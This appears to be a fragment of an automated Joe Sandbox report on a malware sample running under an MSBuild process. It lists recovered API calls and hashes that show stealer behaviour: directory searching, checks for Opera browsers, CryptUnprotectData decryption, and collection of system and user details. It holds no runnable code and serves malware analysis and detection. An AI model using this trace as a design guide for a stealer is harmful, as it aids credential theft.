  • Part of subcall function 00406E80: LocalFree.KERNEL32(?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F21
• DeleteFileA.KERNEL32(00000000), ref: 00401BE1
• FindNextFileA.KERNEL32(00000000,?,?,00000000), ref: 00401C34
• FindClose.KERNEL32(00000000,?,00000000), ref: 00401C43
  • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
  • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
  • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
  • Part of subcall function 00411610: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
Strings
Memory Dump Source
• Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
• String ID: %$L3B$\*.*
• API String ID: 2220404975-1614187093
• Opcode ID: d9c562cef0e5a590ee84e2ec893f91183f8c785d922770ffd99f33c19f8637d8
• Instruction ID: 1f0ecdccfbf971c4eb3ba04f5591d09edb7ba5691986d76eb2288118b31a76ee
• Opcode Fuzzy Hash: d9c562cef0e5a590ee84e2ec893f91183f8c785d922770ffd99f33c19f8637d8
• Instruction Fuzzy Hash: B5726B70801248EADB15EBA5C951BDDBBB85F19308F5440BEE605732D2DF782B4CCB69
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00416D2B
                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00416D42
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004276A4), ref: 00416D7C
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004276A8), ref: 00416D96
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00E39A50), ref: 00416DD4
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00E39960), ref: 00416DE8
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416DFC
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416E0A
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,004276AC), ref: 00416E1C
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416E30
                                                                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 00416ED1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$FileFind$FirstNextwsprintf
                                                                                                                                                                                                                                                                            • String ID: %s\%s$1pA
                                                                                                                                                                                                                                                                            • API String ID: 111849568-634091350
                                                                                                                                                                                                                                                                            • Opcode ID: 5b2b6f63b55e1f6505acacb7ac47ca8445766713d8ba3f9fb089b02034eb06fe
                                                                                                                                                                                                                                                                            • Instruction ID: 2cb9bfa35f18a05ea18699b2ebf9ea07bfb25382f6a54c62d3d11893d13825a0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b2b6f63b55e1f6505acacb7ac47ca8445766713d8ba3f9fb089b02034eb06fe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D751F4B5800218ABDB14EBA0CC85FEE777DAB48310F00469EFA15A3191D778A748CBE4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00426ABB,?,?,00000000), ref: 0040B0C2
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426CF8,?,00000000), ref: 0040B13C
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426CFC,?,00000000), ref: 0040B156
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,Opera,00426ACA,00426AC7,00426AC6,00426AC3,00426AC2,00426ABF,00426ABE,?,00000000), ref: 0040B1EB
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX,?,00000000), ref: 0040B203
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,Opera Crypto,?,00000000), ref: 0040B21B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                            • String ID: :$Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                                                                            • API String ID: 2567437900-1444899082
                                                                                                                                                                                                                                                                            • Opcode ID: 5d42b56d7676d8b34d9992f1e80027433cf82ce389d1765d60d0a489b8323c70
                                                                                                                                                                                                                                                                            • Instruction ID: efbda9057b4a3320160d0838e4bb094c7ba51aae6ab1d3ada1da399397eb047e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d42b56d7676d8b34d9992f1e80027433cf82ce389d1765d60d0a489b8323c70
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31528030901248EACB15EBA5C955BDDBBB99F19304F5040BEE505732D2DBB82B4CCBB6
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416959
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0041697E
                                                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(00000000,?,?,00000004), ref: 00416987
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004169A6
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004169C4
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004169E7
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00416A4E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
                                                                                                                                                                                                                                                                            • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                                                            • API String ID: 1884655365-147700698
                                                                                                                                                                                                                                                                            • Opcode ID: d7aebe20fdd1c2a3f997332edf9cf354093250a779c0c78778188edb4f5eaf6f
                                                                                                                                                                                                                                                                            • Instruction ID: 2ef20b39a4741f89efdf50063d3a739dc061204c8983723d5aff4085e6fe27b5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7aebe20fdd1c2a3f997332edf9cf354093250a779c0c78778188edb4f5eaf6f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A961D3B1500244ABDB30EF61DC45FEE3B79AF05704F50815EF90963292DF78AA89CB69
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,00426AAF,00000000,?,00426CB0,?,?,00426AAF,?,00000004), ref: 0040A5C1
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426CB4), ref: 0040A5FD
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426CB8), ref: 0040A617
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00E38DF0,00000000,?,?,?,00426CBC,?,?,00426AB2), ref: 0040A6AC
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2567437900-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,0042708F,?,?,00000001), ref: 004103B7
                                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 004103C9
                                                                                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 004103D4
                                                                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410406
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,00000001), ref: 004104AA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                                                                                                            • API String ID: 507856799-4001269591
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410311
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00410318
                                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?), ref: 00410327
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00410352
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                            • String ID: wwww
                                                                                                                                                                                                                                                                            • API String ID: 362916592-671953474
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410AEF
                                                                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00410AFF
                                                                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00410B11
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00410B7E
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410B89
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 562399079-0
                                                                                                                                                                                                                                                                            • Opcode ID: f92828822c5e3a766a07ba7ce07d337e575ff1d799c38124f09fc6912ca1c156
                                                                                                                                                                                                                                                                            • Instruction ID: 0017932ee8b28542c993bd3d3cbb85d98208f81dbbf63d1189c3c8f2ca0ceaa0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f92828822c5e3a766a07ba7ce07d337e575ff1d799c38124f09fc6912ca1c156
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28217E71A00118EBCB10DFD5DC45BEEB7BDAB89B14F00416EE505A3291DBB86A488BA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411C09
                                                                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00411C19
                                                                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00411C2B
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,?), ref: 00411C40
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00411C62
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 420147892-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3f0b3f398bad895e9fddeaba7e30e3c8ded22fd77d7e4e16f717514778de6e78
                                                                                                                                                                                                                                                                            • Instruction ID: 783bd51883fbc9235abcb4e0eac7fc77d01b721e3b4511d284faf66e1083b937
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f0b3f398bad895e9fddeaba7e30e3c8ded22fd77d7e4e16f717514778de6e78
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6211BF76A01518ABC711CF89DC45BDEF7B9FB85711F10429AF905D3250D7785A40CBE0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410406
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,00000001), ref: 004104AA
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$FreeInfoLocalLocalelstrcatlstrlen
                                                                                                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                                                                                                            • API String ID: 3280604673-4001269591
                                                                                                                                                                                                                                                                            • Opcode ID: 9d6df98df06dd7049007c4c707a33e25cbf5386fb355e087ae3499b3ae749645
                                                                                                                                                                                                                                                                            • Instruction ID: 28db25313739fa7c55f0f4920395dc49f99e05777687f376b1cd2e96ad76a857
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d6df98df06dd7049007c4c707a33e25cbf5386fb355e087ae3499b3ae749645
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54115E71A00219DBCB14DBD8D885BFDB7B9BB44300F54406EE605A3182DB785A89CBA9
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FF5
                                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?), ref: 0040700D
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 0040702E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Local$AllocCryptDataFreeUnprotect
• String ID:
• API String ID: 2068576380-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 0041022C
• HeapAlloc.KERNEL32(00000000,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 00410233
• GetUserNameA.ADVAPI32(00000000,00E2E4B0), ref: 00410247
Memory Dump Source
• Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Heap$AllocNameProcessUser
• String ID:
• API String ID: 1206570057-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: InfoSystemwsprintf
• String ID:
• API String ID: 2452939696-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33B38), ref: 00418CF3
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E37218,00417D7D,?,00000040,00000064,00414180,00413720,?,0000002C,00000064,004140D0,00414120,?,00000024,00000064,00414080), ref: 00418D05
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E37248), ref: 00418D16
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E37080), ref: 00418D28
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E37260), ref: 00418D3A
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E37098), ref: 00418D4B
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E370B0), ref: 00418D5D
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E370C8), ref: 00418D6F
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E37188), ref: 00418D80
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418D90
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,HttpQueryInfoA), ref: 00419297
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,InternetSetOptionA), ref: 004192AE
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6CDF0000,SymMatchString), ref: 004193AE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
